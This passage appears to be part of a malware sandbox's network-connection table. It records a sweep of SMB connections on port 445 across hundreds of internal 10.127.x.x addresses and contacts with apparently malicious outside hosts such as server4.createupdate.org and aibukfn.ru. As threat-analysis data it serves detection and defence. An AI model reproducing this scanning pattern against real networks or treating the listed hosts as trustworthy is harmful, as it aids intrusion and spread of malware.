| N/A | 10.127.1.227:445 | tcp | |
| N/A | 10.127.1.246:445 | tcp | |
| N/A | 10.127.1.203:445 | tcp | |
| N/A | 10.127.1.228:445 | tcp | |
| N/A | 10.127.1.243:445 | tcp | |
| N/A | 10.127.1.236:445 | tcp | |
| N/A | 10.127.1.209:445 | tcp | |
| N/A | 10.127.1.198:445 | tcp | |
| N/A | 10.127.1.211:445 | tcp | |
| N/A | 10.127.1.217:445 | tcp | |
| N/A | 10.127.1.207:445 | tcp | |
| N/A | 10.127.1.232:445 | tcp | |
| N/A | 10.127.1.250:445 | tcp | |
| N/A | 10.127.1.199:445 | tcp | |
| N/A | 10.127.1.200:445 | tcp | |
| N/A | 10.127.1.205:445 | tcp | |
| N/A | 10.127.1.238:445 | tcp | |
| N/A | 10.127.1.233:445 | tcp | |
| N/A | 10.127.1.202:445 | tcp | |
| N/A | 10.127.1.208:445 | tcp | |
| N/A | 10.127.1.193:445 | tcp | |
| N/A | 10.127.1.216:445 | tcp | |
| N/A | 10.127.1.251:445 | tcp | |
| N/A | 10.127.1.234:445 | tcp | |
| N/A | 10.127.1.241:445 | tcp | |
| N/A | 10.127.1.247:445 | tcp | |
| N/A | 10.127.1.196:445 | tcp | |
| N/A | 10.127.1.213:445 | tcp | |
| N/A | 10.127.1.235:445 | tcp | |
| N/A | 10.127.1.237:445 | tcp | |
| N/A | 10.127.1.221:445 | tcp | |
| N/A | 10.127.1.253:445 | tcp | |
| N/A | 10.127.1.240:445 | tcp | |
| N/A | 10.127.1.245:445 | tcp | |
| N/A | 10.127.1.225:445 | tcp | |
| N/A | 10.127.1.252:445 | tcp | |
| N/A | 10.127.1.201:445 | tcp | |
| N/A | 10.127.1.219:445 | tcp | |
| N/A | 10.127.1.242:445 | tcp | |
| N/A | 10.127.1.197:445 | tcp | |
| N/A | 10.127.1.254:445 | tcp | |
| N/A | 10.127.1.214:445 | tcp | |
| N/A | 10.127.1.194:445 | tcp | |
| N/A | 10.127.1.226:445 | tcp | |
| N/A | 10.127.1.248:445 | tcp | |
| N/A | 10.127.1.220:445 | tcp | |
| N/A | 10.127.1.239:445 | tcp | |
| N/A | 10.127.1.244:445 | tcp | |
| N/A | 10.127.1.218:445 | tcp | |
| N/A | 10.127.1.231:445 | tcp | |
| N/A | 10.127.1.229:445 | tcp | |
| N/A | 10.127.1.215:445 | tcp | |
| N/A | 10.127.1.210:445 | tcp | |
| N/A | 10.127.1.224:445 | tcp | |
| N/A | 10.127.2.0:445 | tcp | |
| N/A | 10.127.1.249:445 | tcp | |
| N/A | 10.127.1.223:445 | tcp | |
| N/A | 10.127.1.255:445 | tcp | |
| N/A | 10.127.1.222:445 | tcp | |
| N/A | 10.127.1.230:445 | tcp | |
| BG | 185.82.216.104:443 | server4.createupdate.org | tcp |
| N/A | 10.127.2.58:445 | tcp | |
| N/A | 10.127.2.15:445 | tcp | |
| N/A | 10.127.2.63:445 | tcp | |
| N/A | 10.127.2.48:445 | tcp | |
| N/A | 10.127.2.62:445 | tcp | |
| N/A | 10.127.2.8:445 | tcp | |
| N/A | 10.127.2.4:445 | tcp | |
| N/A | 10.127.2.13:445 | tcp | |
| N/A | 10.127.2.5:445 | tcp | |
| N/A | 10.127.2.9:445 | tcp | |
| N/A | 10.127.2.18:445 | tcp | |
| N/A | 10.127.2.37:445 | tcp | |
| N/A | 10.127.2.38:445 | tcp | |
| N/A | 10.127.2.11:445 | tcp | |
| N/A | 10.127.2.19:445 | tcp | |
| N/A | 10.127.2.26:445 | tcp | |
| N/A | 10.127.2.49:445 | tcp | |
| N/A | 10.127.2.16:445 | tcp | |
| N/A | 10.127.2.20:445 | tcp | |
| N/A | 10.127.2.32:445 | tcp | |
| N/A | 10.127.2.46:445 | tcp | |
| N/A | 10.127.2.31:445 | tcp | |
| N/A | 10.127.2.45:445 | tcp | |
| N/A | 10.127.2.29:445 | tcp | |
| N/A | 10.127.2.44:445 | tcp | |
| N/A | 10.127.2.21:445 | tcp | |
| N/A | 10.127.2.24:445 | tcp | |
| N/A | 10.127.2.52:445 | tcp | |
| N/A | 10.127.2.64:445 | tcp | |
| N/A | 10.127.2.10:445 | tcp | |
| N/A | 10.127.2.47:445 | tcp | |
| N/A | 10.127.2.53:445 | tcp | |
| N/A | 10.127.2.17:445 | tcp | |
| N/A | 10.127.2.23:445 | tcp | |
| N/A | 10.127.2.33:445 | tcp | |
| N/A | 10.127.2.39:445 | tcp | |
| N/A | 10.127.2.50:445 | tcp | |
| N/A | 10.127.2.28:445 | tcp | |
| N/A | 10.127.2.25:445 | tcp | |
| N/A | 10.127.2.56:445 | tcp | |
| N/A | 10.127.2.60:445 | tcp | |
| N/A | 10.127.2.3:445 | tcp | |
| N/A | 10.127.2.12:445 | tcp | |
| N/A | 10.127.2.40:445 | tcp | |
| N/A | 10.127.2.61:445 | tcp | |
| N/A | 10.127.2.42:445 | tcp | |
| N/A | 10.127.2.41:445 | tcp | |
| N/A | 10.127.2.27:445 | tcp | |
| N/A | 10.127.2.55:445 | tcp | |
| N/A | 10.127.2.22:445 | tcp | |
| N/A | 10.127.2.35:445 | tcp | |
| N/A | 10.127.2.43:445 | tcp | |
| N/A | 10.127.2.57:445 | tcp | |
| N/A | 10.127.2.1:445 | tcp | |
| N/A | 10.127.2.14:445 | tcp | |
| N/A | 10.127.2.2:445 | tcp | |
| N/A | 10.127.2.34:445 | tcp | |
| N/A | 10.127.2.51:445 | tcp | |
| N/A | 10.127.2.7:445 | tcp | |
| N/A | 10.127.2.59:445 | tcp | |
| N/A | 10.127.2.6:445 | tcp | |
| N/A | 10.127.2.30:445 | tcp | |
| N/A | 10.127.2.54:445 | tcp | |
| N/A | 10.127.2.36:445 | tcp | |
| N/A | 10.127.2.101:445 | tcp | |
| N/A | 10.127.2.89:445 | tcp | |
| N/A | 10.127.2.93:445 | tcp | |
| N/A | 10.127.2.128:445 | tcp | |
| N/A | 10.127.2.118:445 | tcp | |
| N/A | 10.127.2.82:445 | tcp | |
| N/A | 10.127.2.95:445 | tcp | |
| N/A | 10.127.2.69:445 | tcp | |
| N/A | 10.127.2.79:445 | tcp | |
| N/A | 10.127.2.88:445 | tcp | |
| N/A | 10.127.2.71:445 | tcp | |
| N/A | 10.127.2.85:445 | tcp | |
| N/A | 10.127.2.122:445 | tcp | |
| N/A | 10.127.2.108:445 | tcp | |
| N/A | 10.127.2.86:445 | tcp | |
| N/A | 10.127.2.121:445 | tcp | |
| N/A | 10.127.2.126:445 | tcp | |
| N/A | 10.127.2.72:445 | tcp | |
| N/A | 10.127.2.91:445 | tcp | |
| N/A | 10.127.2.65:445 | tcp | |
| N/A | 10.127.2.73:445 | tcp | |
| N/A | 10.127.2.96:445 | tcp | |
| N/A | 10.127.2.66:445 | tcp | |
| N/A | 10.127.2.78:445 | tcp | |
| N/A | 10.127.2.109:445 | tcp | |
| N/A | 10.127.2.68:445 | tcp | |
| N/A | 10.127.2.105:445 | tcp | |
| N/A | 10.127.2.127:445 | tcp | |
| N/A | 10.127.2.77:445 | tcp | |
| N/A | 10.127.2.117:445 | tcp | |
| N/A | 10.127.2.81:445 | tcp | |
| N/A | 10.127.2.124:445 | tcp | |
| N/A | 10.127.2.92:445 | tcp | |
| N/A | 10.127.2.70:445 | tcp | |
| N/A | 10.127.2.94:445 | tcp | |
| N/A | 10.127.2.102:445 | tcp | |
| N/A | 10.127.2.119:445 | tcp | |
| N/A | 10.127.2.111:445 | tcp | |
| N/A | 10.127.2.100:445 | tcp | |
| N/A | 10.127.2.84:445 | tcp | |
| N/A | 10.127.2.75:445 | tcp | |
| N/A | 10.127.2.97:445 | tcp | |
| N/A | 10.127.2.110:445 | tcp | |
| N/A | 10.127.2.120:445 | tcp | |
| N/A | 10.127.2.87:445 | tcp | |
| N/A | 10.127.2.106:445 | tcp | |
| N/A | 10.127.2.114:445 | tcp | |
| N/A | 10.127.2.123:445 | tcp | |
| N/A | 10.127.2.98:445 | tcp | |
| N/A | 10.127.2.113:445 | tcp | |
| N/A | 10.127.2.83:445 | tcp | |
| N/A | 10.127.2.99:445 | tcp | |
| N/A | 10.127.2.115:445 | tcp | |
| N/A | 10.127.2.90:445 | tcp | |
| N/A | 10.127.2.103:445 | tcp | |
| N/A | 10.127.2.104:445 | tcp | |
| N/A | 10.127.2.107:445 | tcp | |
| N/A | 10.127.2.116:445 | tcp | |
| N/A | 10.127.2.125:445 | tcp | |
| N/A | 10.127.2.67:445 | tcp | |
| N/A | 10.127.2.80:445 | tcp | |
| N/A | 10.127.2.112:445 | tcp | |
| N/A | 10.127.2.74:445 | tcp | |
| N/A | 10.127.2.76:445 | tcp | |
| N/A | 10.127.2.145:445 | tcp | |
| N/A | 10.127.2.192:445 | tcp | |
| N/A | 10.127.2.179:445 | tcp | |
| N/A | 10.127.2.140:445 | tcp | |
| N/A | 10.127.2.185:445 | tcp | |
| N/A | 10.127.2.191:445 | tcp | |
| N/A | 10.127.2.172:445 | tcp | |
| N/A | 10.127.2.154:445 | tcp | |
| N/A | 10.127.2.153:445 | tcp | |
| N/A | 10.127.2.136:445 | tcp | |
| N/A | 10.127.2.150:445 | tcp | |
| N/A | 10.127.2.156:445 | tcp | |
| N/A | 10.127.2.177:445 | tcp | |
| N/A | 10.127.2.163:445 | tcp | |
| N/A | 10.127.2.168:445 | tcp | |
| N/A | 10.127.2.175:445 | tcp | |
| N/A | 10.127.2.178:445 | tcp | |
| N/A | 10.127.2.132:445 | tcp | |
| N/A | 10.127.2.134:445 | tcp | |
| N/A | 10.127.2.157:445 | tcp | |
| N/A | 10.127.2.160:445 | tcp | |
| N/A | 10.127.2.139:445 | tcp | |
| N/A | 10.127.2.162:445 | tcp | |
| N/A | 10.127.2.174:445 | tcp | |
| N/A | 10.127.2.158:445 | tcp | |
| N/A | 10.127.2.188:445 | tcp | |
| N/A | 10.127.2.155:445 | tcp | |
| N/A | 10.127.2.133:445 | tcp | |
| N/A | 10.127.2.173:445 | tcp | |
| N/A | 10.127.2.161:445 | tcp | |
| N/A | 10.127.2.182:445 | tcp | |
| N/A | 10.127.2.144:445 | tcp | |
| N/A | 10.127.2.159:445 | tcp | |
| N/A | 10.127.2.135:445 | tcp | |
| N/A | 10.127.2.147:445 | tcp | |
| N/A | 10.127.2.171:445 | tcp | |
| N/A | 10.127.2.149:445 | tcp | |
| N/A | 10.127.2.165:445 | tcp | |
| N/A | 10.127.2.181:445 | tcp | |
| N/A | 10.127.2.189:445 | tcp | |
| N/A | 10.127.2.180:445 | tcp | |
| N/A | 10.127.2.186:445 | tcp | |
| N/A | 10.127.2.164:445 | tcp | |
| N/A | 10.127.2.169:445 | tcp | |
| N/A | 10.127.2.167:445 | tcp | |
| N/A | 10.127.2.166:445 | tcp | |
| N/A | 10.127.2.130:445 | tcp | |
| N/A | 10.127.2.143:445 | tcp | |
| N/A | 10.127.2.187:445 | tcp | |
| N/A | 10.127.2.129:445 | tcp | |
| N/A | 10.127.2.131:445 | tcp | |
| N/A | 10.127.2.190:445 | tcp | |
| N/A | 10.127.2.141:445 | tcp | |
| N/A | 10.127.2.152:445 | tcp | |
| N/A | 10.127.2.137:445 | tcp | |
| N/A | 10.127.2.176:445 | tcp | |
| N/A | 10.127.2.184:445 | tcp | |
| N/A | 10.127.2.151:445 | tcp | |
| N/A | 10.127.2.142:445 | tcp | |
| N/A | 10.127.2.146:445 | tcp | |
| N/A | 10.127.2.148:445 | tcp | |
| N/A | 10.127.2.170:445 | tcp | |
| N/A | 10.127.2.138:445 | tcp | |
| N/A | 10.127.2.183:445 | tcp | |
| TR | 195.16.74.230:80 | aibukfn.ru | tcp |
| N/A | 10.127.2.203:445 | tcp | |
| N/A | 10.127.2.217:445 | tcp | |
| N/A | 10.127.2.216:445 | tcp | |
| N/A | 10.127.2.224:445 | tcp | |
| N/A | 10.127.2.231:445 | tcp | |
| N/A | 10.127.2.210:445 | tcp | |
| N/A | 10.127.2.228:445 | tcp | |
| N/A | 10.127.2.194:445 | tcp | |
| N/A | 10.127.2.214:445 | tcp | |
| N/A | 10.127.2.226:445 | tcp | |
| N/A | 10.127.2.232:445 | tcp | |
| N/A | 10.127.2.201:445 | tcp | |
| N/A | 10.127.2.233:445 | tcp | |
| N/A | 10.127.2.234:445 | tcp | |
| N/A | 10.127.2.205:445 | tcp | |
| N/A | 10.127.2.227:445 | tcp | |
| N/A | 10.127.2.241:445 | tcp | |
| N/A | 10.127.2.209:445 | tcp | |
| N/A | 10.127.2.244:445 | tcp | |
| N/A | 10.127.2.198:445 | tcp | |
| N/A | 10.127.2.196:445 | tcp | |
| N/A | 10.127.2.220:445 | tcp | |
| N/A | 10.127.2.202:445 | tcp | |
| N/A | 10.127.2.243:445 | tcp | |
| N/A | 10.127.2.215:445 | tcp | |
| N/A | 10.127.2.223:445 | tcp | |
| N/A | 10.127.2.237:445 | tcp | |
| N/A | 10.127.2.193:445 | tcp | |
| N/A | 10.127.2.218:445 | tcp | |
| N/A | 10.127.2.230:445 | tcp | |
| N/A | 10.127.2.245:445 | tcp | |
| N/A | 10.127.2.239:445 | tcp | |
| N/A | 10.127.2.242:445 | tcp | |
| N/A | 10.127.2.204:445 | tcp | |
| N/A | 10.127.2.207:445 | tcp | |
| N/A | 10.127.2.248:445 | tcp | |
| N/A | 10.127.2.212:445 | tcp | |
| N/A | 10.127.2.213:445 | tcp | |
| N/A | 10.127.2.222:445 | tcp | |
| N/A | 10.127.2.246:445 | tcp | |
| N/A | 10.127.2.247:445 | tcp | |
| N/A | 10.127.2.195:445 | tcp | |
| N/A | 10.127.2.211:445 | tcp | |
| N/A | 10.127.2.206:445 | tcp | |
| N/A | 10.127.2.249:445 | tcp | |
| N/A | 10.127.2.251:445 | tcp | |
| N/A | 10.127.2.235:445 | tcp | |
| N/A | 10.127.2.197:445 | tcp | |
| N/A | 10.127.2.208:445 | tcp | |
| N/A | 10.127.2.238:445 | tcp | |
| N/A | 10.127.2.200:445 | tcp | |
| N/A | 10.127.2.219:445 | tcp | |
| N/A | 10.127.2.236:445 | tcp | |
| N/A | 10.127.2.199:445 | tcp | |
| N/A | 10.127.2.221:445 | tcp | |
| N/A | 10.127.2.250:445 | tcp | |
| N/A | 10.127.2.229:445 | tcp | |
| N/A | 10.127.2.240:445 | tcp | |
| N/A | 10.127.2.253:445 | tcp | |
| N/A | 10.127.3.0:445 | tcp | |
| N/A | 10.127.2.255:445 | tcp | |
| N/A | 10.127.2.225:445 | tcp | |
| N/A | 10.127.2.254:445 | tcp | |
| N/A | 10.127.2.252:445 | tcp | |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| N/A | 10.127.3.5:445 | tcp | |
| N/A | 10.127.3.9:445 | tcp | |
| N/A | 10.127.3.4:445 | tcp | |
| N/A | 10.127.3.8:445 | tcp | |
| N/A | 10.127.3.12:445 | tcp | |
| N/A | 10.127.3.10:445 | tcp | |
| N/A | 10.127.3.7:445 | tcp | |
| N/A | 10.127.3.1:445 | tcp | |
| N/A | 10.127.3.14:445 | tcp | |
| N/A | 10.127.3.3:445 | tcp | |
| N/A | 10.127.3.2:445 | tcp | |
| N/A | 10.127.3.6:445 | tcp | |
| N/A | 10.127.3.11:445 | tcp | |
| N/A | 10.127.3.13:445 | tcp | |
| N/A | 10.127.3.18:445 | tcp | |
| N/A | 10.127.3.26:445 | tcp | |
| N/A | 10.127.3.47:445 | tcp | |
| N/A | 10.127.3.17:445 | tcp | |
| N/A | 10.127.3.30:445 | tcp | |
| N/A | 10.127.3.21:445 | tcp | |
| N/A | 10.127.3.22:445 | tcp | |
| N/A | 10.127.3.24:445 | tcp | |
| N/A | 10.127.3.49:445 | tcp | |
| N/A | 10.127.3.38:445 | tcp | |
| N/A | 10.127.3.44:445 | tcp | |
| N/A | 10.127.3.54:445 | tcp | |
| N/A | 10.127.3.50:445 | tcp | |
| N/A | 10.127.3.43:445 | tcp | |
| N/A | 10.127.3.34:445 | tcp | |
| N/A | 10.127.3.39:445 | tcp | |
| N/A | 10.127.3.28:445 | tcp | |
| N/A | 10.127.3.45:445 | tcp | |
| N/A | 10.127.3.25:445 | tcp | |
| N/A | 10.127.3.16:445 | tcp | |
| N/A | 10.127.3.41:445 | tcp | |
| N/A | 10.127.3.48:445 | tcp | |
| N/A | 10.127.3.40:445 | tcp | |
| N/A | 10.127.3.32:445 | tcp | |
| N/A | 10.127.3.42:445 | tcp | |
| N/A | 10.127.3.53:445 | tcp | |
| N/A | 10.127.3.27:445 | tcp | |
| N/A | 10.127.3.46:445 | tcp | |
| N/A | 10.127.3.33:445 | tcp | |
| N/A | 10.127.3.20:445 | tcp | |
| N/A | 10.127.3.19:445 | tcp | |
| N/A | 10.127.3.62:445 | tcp | |
| N/A | 10.127.3.58:445 | tcp | |
| N/A | 10.127.3.31:445 | tcp | |
| N/A | 10.127.3.35:445 | tcp | |
| N/A | 10.127.3.36:445 | tcp | |
| N/A | 10.127.3.23:445 | tcp | |
| N/A | 10.127.3.15:445 | tcp | |
| N/A | 10.127.3.55:445 | tcp | |
| N/A | 10.127.3.29:445 | tcp | |
| N/A | 10.127.3.51:445 | tcp | |
| N/A | 10.127.3.37:445 | tcp | |
| N/A | 10.127.3.57:445 | tcp | |
| N/A | 10.127.3.56:445 | tcp | |
| N/A | 10.127.3.52:445 | tcp | |
| N/A | 10.127.3.60:445 | tcp | |
| N/A | 10.127.3.59:445 | tcp | |
| N/A | 10.127.3.63:445 | tcp | |
| N/A | 10.127.3.61:445 | tcp | |
| N/A | 10.127.3.64:445 | tcp | |
| N/A | 10.127.3.77:445 | tcp | |
| N/A | 10.127.3.76:445 | tcp | |
| N/A | 10.127.3.78:445 | tcp | |
| N/A | 10.127.3.72:445 | tcp | |
| N/A | 10.127.3.66:445 | tcp | |
| N/A | 10.127.3.67:445 | tcp | |
| N/A | 10.127.3.75:445 | tcp | |
| N/A | 10.127.3.71:445 | tcp | |
| N/A | 10.127.3.68:445 | tcp | |
| N/A | 10.127.3.65:445 | tcp | |
| N/A | 10.127.3.70:445 | tcp | |
| N/A | 10.127.3.74:445 | tcp | |
| N/A | 10.127.3.73:445 | tcp | |
| N/A | 10.127.3.69:445 | tcp | |
| N/A | 10.127.3.80:445 | tcp | |
| N/A | 10.127.3.96:445 | tcp | |
| N/A | 10.127.3.106:445 | tcp | |
| N/A | 10.127.3.92:445 | tcp | |
| N/A | 10.127.3.100:445 | tcp | |
| N/A | 10.127.3.83:445 | tcp | |
| N/A | 10.127.3.101:445 | tcp | |
| N/A | 10.127.3.81:445 | tcp | |
| N/A | 10.127.3.112:445 | tcp | |
| N/A | 10.127.3.108:445 | tcp | |
| N/A | 10.127.3.105:445 | tcp | |
| N/A | 10.127.3.107:445 | tcp | |
| N/A | 10.127.3.98:445 | tcp | |
| N/A | 10.127.3.95:445 | tcp | |
| N/A | 10.127.3.103:445 | tcp | |
| N/A | 10.127.3.97:445 | tcp | |
| N/A | 10.127.3.102:445 | tcp | |
| N/A | 10.127.3.90:445 | tcp | |
| N/A | 10.127.3.91:445 | tcp | |
| N/A | 10.127.3.89:445 | tcp | |
| N/A | 10.127.3.82:445 | tcp | |
| N/A | 10.127.3.85:445 | tcp | |
| N/A | 10.127.3.87:445 | tcp | |
| N/A | 10.127.3.111:445 | tcp | |
| N/A | 10.127.3.93:445 | tcp | |
| N/A | 10.127.3.86:445 | tcp | |
| N/A | 10.127.3.79:445 | tcp | |
| N/A | 10.127.3.109:445 | tcp | |
| N/A | 10.127.3.113:445 | tcp | |
| N/A | 10.127.3.88:445 | tcp | |
| N/A | 10.127.3.118:445 | tcp | |
| N/A | 10.127.3.121:445 | tcp | |
| N/A | 10.127.3.125:445 | tcp | |
| N/A | 10.127.3.84:445 | tcp | |
| N/A | 10.127.3.94:445 | tcp | |
| N/A | 10.127.3.104:445 | tcp | |
| N/A | 10.127.3.110:445 | tcp | |
| N/A | 10.127.3.114:445 | tcp | |
| N/A | 10.127.3.99:445 | tcp | |
| N/A | 10.127.3.122:445 | tcp | |
| N/A | 10.127.3.115:445 | tcp | |
| N/A | 10.127.3.127:445 | tcp | |
| N/A | 10.127.3.120:445 | tcp | |
| N/A | 10.127.3.117:445 | tcp | |
| N/A | 10.127.3.126:445 | tcp | |
| N/A | 10.127.3.116:445 | tcp | |
| N/A | 10.127.3.124:445 | tcp | |
| N/A | 10.127.3.119:445 | tcp | |
| N/A | 10.127.3.123:445 | tcp | |
| N/A | 10.127.3.128:445 | tcp | |
| N/A | 10.127.3.139:445 | tcp | |
| N/A | 10.127.3.141:445 | tcp | |
| N/A | 10.127.3.129:445 | tcp | |
| N/A | 10.127.3.135:445 | tcp | |
| N/A | 10.127.3.137:445 | tcp | |
| N/A | 10.127.3.133:445 | tcp | |
| N/A | 10.127.3.136:445 | tcp | |
| N/A | 10.127.3.130:445 | tcp | |
| N/A | 10.127.3.132:445 | tcp | |
| N/A | 10.127.3.131:445 | tcp | |
| N/A | 10.127.3.134:445 | tcp | |
| N/A | 10.127.3.138:445 | tcp | |
| N/A | 10.127.3.140:445 | tcp | |
| N/A | 10.127.3.142:445 | tcp | |
| N/A | 10.127.3.177:445 | tcp | |
| N/A | 10.127.3.172:445 | tcp | |
| N/A | 10.127.3.165:445 | tcp | |
| N/A | 10.127.3.154:445 | tcp | |
| N/A | 10.127.3.174:445 | tcp | |
| N/A | 10.127.3.149:445 | tcp | |
| N/A | 10.127.3.153:445 | tcp | |
| N/A | 10.127.3.143:445 | tcp | |
| N/A | 10.127.3.171:445 | tcp | |
| N/A | 10.127.3.158:445 | tcp | |
| N/A | 10.127.3.151:445 | tcp | |
| N/A | 10.127.3.161:445 | tcp | |
| N/A | 10.127.3.163:445 | tcp | |
| N/A | 10.127.3.147:445 | tcp | |
| N/A | 10.127.3.175:445 | tcp | |
| N/A | 10.127.3.148:445 | tcp | |
| N/A | 10.127.3.169:445 | tcp | |
| N/A | 10.127.3.162:445 | tcp | |
| N/A | 10.127.3.176:445 | tcp | |
| N/A | 10.127.3.150:445 | tcp | |
| N/A | 10.127.3.145:445 | tcp | |
| N/A | 10.127.3.173:445 | tcp | |
| N/A | 10.127.3.146:445 | tcp | |
| N/A | 10.127.3.156:445 | tcp | |
| N/A | 10.127.3.178:445 | tcp | |
| N/A | 10.127.3.155:445 | tcp | |
| N/A | 10.127.3.157:445 | tcp | |
| N/A | 10.127.3.164:445 | tcp | |
| N/A | 10.127.3.170:445 | tcp | |
| N/A | 10.127.3.144:445 | tcp | |
| N/A | 10.127.3.152:445 | tcp | |
| N/A | 10.127.3.168:445 | tcp | |
| N/A | 10.127.3.167:445 | tcp | |
| N/A | 10.127.3.179:445 | tcp | |
| N/A | 10.127.3.166:445 | tcp | |
| N/A | 10.127.3.186:445 | tcp | |
| N/A | 10.127.3.188:445 | tcp | |
| N/A | 10.127.3.159:445 | tcp | |
| N/A | 10.127.3.191:445 | tcp | |
| N/A | 10.127.3.160:445 | tcp | |
| N/A | 10.127.3.184:445 | tcp | |
| N/A | 10.127.3.187:445 | tcp | |
| N/A | 10.127.3.181:445 | tcp | |
| N/A | 10.127.3.192:445 | tcp | |
| N/A | 10.127.3.190:445 | tcp | |
| N/A | 10.127.3.180:445 | tcp | |
| N/A | 10.127.3.185:445 | tcp | |
| N/A | 10.127.3.182:445 | tcp | |
| N/A | 10.127.3.183:445 | tcp | |
| N/A | 10.127.3.189:445 | tcp | |
| N/A | 10.127.3.204:445 | tcp | |
| N/A | 10.127.3.198:445 | tcp | |
| N/A | 10.127.3.197:445 | tcp | |
| N/A | 10.127.3.194:445 | tcp | |
| N/A | 10.127.3.202:445 | tcp | |
| N/A | 10.127.3.193:445 | tcp | |
| N/A | 10.127.3.200:445 | tcp | |
| N/A | 10.127.3.201:445 | tcp | |
| N/A | 10.127.3.203:445 | tcp | |
| N/A | 10.127.3.196:445 | tcp | |
| N/A | 10.127.3.206:445 | tcp | |
| N/A | 10.127.3.199:445 | tcp | |
| N/A | 10.127.3.205:445 | tcp | |
| N/A | 10.127.3.195:445 | tcp | |
| N/A | 10.127.3.214:445 | tcp | |
| N/A | 10.127.3.218:445 | tcp | |
| N/A | 10.127.3.219:445 | tcp | |
| N/A | 10.127.3.221:445 | tcp | |
| N/A | 10.127.3.223:445 | tcp | |
| N/A | 10.127.3.229:445 | tcp | |
| N/A | 10.127.3.239:445 | tcp | |
| N/A | 10.127.3.230:445 | tcp | |
| N/A | 10.127.3.224:445 | tcp | |
| N/A | 10.127.3.209:445 | tcp | |
| N/A | 10.127.3.232:445 | tcp | |
| N/A | 10.127.3.231:445 | tcp | |
| N/A | 10.127.3.242:445 | tcp | |
| N/A | 10.127.3.236:445 | tcp | |
| N/A | 10.127.3.233:445 | tcp | |
| N/A | 10.127.3.234:445 | tcp | |
| N/A | 10.127.3.216:445 | tcp | |
| N/A | 10.127.3.210:445 | tcp | |
| N/A | 10.127.3.215:445 | tcp | |
| N/A | 10.127.3.211:445 | tcp | |
| N/A | 10.127.3.220:445 | tcp | |
| N/A | 10.127.3.225:445 | tcp | |
| N/A | 10.127.3.228:445 | tcp | |
| N/A | 10.127.3.222:445 | tcp | |
| N/A | 10.127.3.226:445 | tcp | |
| N/A | 10.127.3.213:445 | tcp | |
| N/A | 10.127.3.235:445 | tcp | |
| N/A | 10.127.3.241:445 | tcp | |
| N/A | 10.127.3.207:445 | tcp | |
| N/A | 10.127.3.212:445 | tcp | |
| N/A | 10.127.3.237:445 | tcp | |
| N/A | 10.127.3.238:445 | tcp | |
| N/A | 10.127.3.240:445 | tcp | |
| N/A | 10.127.3.227:445 | tcp | |
| N/A | 10.127.3.208:445 | tcp | |
| N/A | 10.127.3.217:445 | tcp | |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| N/A | 10.127.3.248:445 | tcp | |
| N/A | 10.127.3.254:445 | tcp | |
| N/A | 10.127.3.245:445 | tcp | |
| N/A | 10.127.3.253:445 | tcp | |
| N/A | 10.127.4.0:445 | tcp | |
| N/A | 10.127.3.247:445 | tcp | |
| N/A | 10.127.3.250:445 | tcp | |
| N/A | 10.127.3.244:445 | tcp | |
| N/A | 10.127.3.255:445 | tcp | |
| N/A | 10.127.3.249:445 | tcp | |
| N/A | 10.127.3.251:445 | tcp | |
| N/A | 10.127.3.243:445 | tcp | |
| N/A | 10.127.3.252:445 | tcp | |
| N/A | 10.127.3.246:445 | tcp | |
| US | 13.89.179.12:443 | nw-umwatson.events.data.microsoft.com | tcp |
| N/A | 10.127.4.14:445 | tcp | |
| N/A | 10.127.4.13:445 | tcp | |
| N/A | 10.127.4.5:445 | tcp | |
| N/A | 10.127.4.3:445 | tcp | |
| N/A | 10.127.4.4:445 | tcp | |
| N/A | 10.127.4.9:445 | tcp | |
| N/A | 10.127.4.10:445 | tcp | |
| N/A | 10.127.4.8:445 | tcp | |
| N/A | 10.127.4.12:445 | tcp | |
| N/A | 10.127.4.6:445 | tcp | |
| N/A | 10.127.4.1:445 | tcp | |
| N/A | 10.127.4.11:445 | tcp | |
| N/A | 10.127.4.7:445 | tcp | |
| N/A | 10.127.4.2:445 | tcp | |
| N/A | 10.127.4.28:445 | tcp | |
| N/A | 10.127.4.49:445 | tcp | |
| N/A | 10.127.4.43:445 | tcp | |
| N/A | 10.127.4.47:445 | tcp | |
| N/A | 10.127.4.29:445 | tcp | |
| N/A | 10.127.4.26:445 | tcp | |
| N/A | 10.127.4.19:445 | tcp | |
| N/A | 10.127.4.42:445 | tcp | |
| N/A | 10.127.4.37:445 | tcp | |
| N/A | 10.127.4.30:445 | tcp | |
| N/A | 10.127.4.48:445 | tcp | |
| N/A | 10.127.4.39:445 | tcp | |
| US | 8.8.8.8:53 | 12.179.89.13.in-addr.arpa | udp |
| N/A | 10.127.4.38:445 | tcp | |
| N/A | 10.127.4.45:445 | tcp | |
| N/A | 10.127.4.20:445 | tcp | |
| N/A | 10.127.4.31:445 | tcp | |
| N/A | 10.127.4.16:445 | tcp | |
| N/A | 10.127.4.36:445 | tcp | |
| N/A | 10.127.4.24:445 | tcp | |
| N/A | 10.127.4.40:445 | tcp | |
| N/A | 10.127.4.44:445 | tcp | |
| N/A | 10.127.4.25:445 | tcp | |
| N/A | 10.127.4.41:445 | tcp | |
| N/A | 10.127.4.33:445 | tcp | |
| N/A | 10.127.4.18:445 | tcp | |
| N/A | 10.127.4.23:445 | tcp | |
| N/A | 10.127.4.32:445 | tcp | |
| N/A | 10.127.4.17:445 | tcp | |
| N/A | 10.127.4.22:445 | tcp | |
| N/A | 10.127.4.27:445 | tcp | |
| N/A | 10.127.4.34:445 | tcp | |
| N/A | 10.127.4.21:445 | tcp | |
| N/A | 10.127.4.46:445 | tcp | |
| N/A | 10.127.4.35:445 | tcp | |
| N/A | 10.127.4.15:445 | tcp | |
| N/A | 10.127.4.50:445 | tcp | |
| N/A | 10.127.4.52:445 | tcp | |
| N/A | 10.127.4.54:445 | tcp | |
| N/A | 10.127.4.64:445 | tcp | |
| N/A | 10.127.4.51:445 | tcp | |
| N/A | 10.127.4.57:445 | tcp | |
| N/A | 10.127.4.63:445 | tcp | |
| N/A | 10.127.4.55:445 | tcp | |
| N/A | 10.127.4.56:445 | tcp | |
| N/A | 10.127.4.53:445 | tcp | |
| N/A | 10.127.4.61:445 | tcp | |
| N/A | 10.127.4.60:445 | tcp | |
| N/A | 10.127.4.62:445 | tcp | |
| N/A | 10.127.4.59:445 | tcp | |
| N/A | 10.127.4.58:445 | tcp | |
| N/A | 10.127.4.77:445 | tcp | |
| N/A | 10.127.4.67:445 | tcp | |
| N/A | 10.127.4.74:445 | tcp | |
| N/A | 10.127.4.66:445 | tcp | |
| N/A | 10.127.4.65:445 | tcp | |
| N/A | 10.127.4.71:445 | tcp | |
